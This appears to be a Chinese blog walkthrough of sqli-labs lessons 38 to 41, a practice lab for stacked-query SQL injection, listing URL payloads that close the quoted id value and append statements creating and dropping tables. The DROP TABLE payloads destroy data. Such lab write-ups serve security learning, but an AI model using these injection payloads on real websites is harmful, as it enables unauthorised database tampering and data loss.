zoukankan      html  css  js  c++  java
  • sqli-labs Less38-Less41

    补充知识:堆叠注入

     

    Lesson 38  GET - Stacked Query injection - string

    (1)先测试

      ?id=1

      SELECT * FROM users WHERE id='1' LIMIT 0,1

       显示正常,id值被单引号包裹

      加上单引号和注释符

      ?id=1' --+

    (2)构造语句

      ?id=1'; create table crow2 like users; --+

       执行成功

    (3)mysql命令行中查看

       插入成功

    (4)删除刚创建的表

      ?id=1'; drop table crow2; --+

       执行成功

       已成功删除

      Lesson 38结束

    Lesson 39  GET - Stacked Query injection - Intiger based

    (1)先测试

      ?id=1

      SELECT * FROM users WHERE id=1 LIMIT 0,1

       显示正常,id值没有被包裹

    (2)直接构造语句

      ?id=1; create table crow like users;--+

       执行成功

    (3)删除刚创建好的表

      ?id=1; drop table crow;--+

       执行成功

       成功删除

      Lesson 39结束

    Lesson 40  GET - Blind based - string - stacked

    (1)先测试

      ?id=1 

      SELECT * FROM users WHERE id=('1') LIMIT 0,1

       显示正常,id值被单引号和括号包裹

      加上单引号和单括号 注释符

      ?id=1') --+

    (2)构造语句

      ?id=1'); create table crow lie users; --+

     

       创建成功

    (3)删除表

      ?id=1'); drop table crow; --+

       执行成功

       删除成功

      Lesson 40结束

    Lesson 41  GET - Blind based - Intiger - Stacked

    (1)先测试

      ?id=1

      SELECT * FROM users WHERE id=1 LIMIT 0,1

       显示正常,id值没有进行包裹

    (2)加上单引号

      ?id=1'

       没有任何回显

      前几关,加上相应的会进行报错,所以证明这次的是盲注,只有输入正确的时候才会显示。不过不怎么影响接下来的操作。

    (3)构造语句

      ?id=1; create table crow like users;--+

     

       创建成功

    (4)删除表

      ?id=1; drop table crow;--+

     

       删除成功

      Lesson 41结束

  • 相关阅读:
    Zabbix-Agent客户端安装
    Zabbix添加监控主机
    Zabbix3.x-Server服务端安装
    hdu-1702-栈和队列
    交换瓶子--蓝桥杯
    四平方和-蓝桥杯
    剪邮票--蓝桥杯--dfs--思路超清晰
    方格填数--蓝桥杯---dfs
    快速排序-quicksort
    日志统计--蓝桥杯--vector
  • 原文地址:https://www.cnblogs.com/zhaihuijie/p/12600489.html
Copyright © 2011-2022 走看看